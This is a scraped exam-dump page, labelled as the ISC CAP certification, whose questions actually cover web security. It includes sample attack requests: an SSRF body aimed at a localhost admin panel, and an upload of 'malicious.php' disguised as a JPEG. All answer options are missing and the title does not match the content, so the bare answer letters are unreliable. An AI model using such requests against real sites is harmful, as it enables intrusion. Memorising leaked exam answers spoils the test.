ISC CAP - Certified Authorization Professional (CAP Japanese version) - CAP Japanese FREE EXAM DUMPS QUESTIONS & ANSWERS

In the screenshot below, which vulnerability is the attacker attempting to exploit?
Request
POST /dashboard/userdata HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cookie: JSESSIONID=7576572ce167b5634ie646de967c759643d53031
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

useragent=http://127.0.0.1/admin

HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 11:42:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12746
Connection: keep-alive
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 65403d71e8745d5e1fe205f44d531
Content-Length: 12746
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
Admin Panel
</title>
Correct Answer: B
Which of the following HTTP response headers prevents the client from caching the HTTP response in the most secure way?
Correct Answer: B
Which of the following is correct?
Correct Answer: C
Which of the following is not a symmetric key encryption algorithm?
Correct Answer: C
Determine the primary defense against SQL injection vulnerabilities.
Correct Answer: C
In the screenshot below, which vulnerability is the attacker attempting to exploit?
POST /upload.php HTTP/1.1
Host: example.com
Cookie: session=xyz123;JSESSIONID=abc123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) rv:107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 12345
Connection: keep-alive

Content-Disposition: form-data; name="avatar"; filename="malicious.php"
Content-Type: image/jpeg
<?php
phpinfo();
?>
Correct Answer: D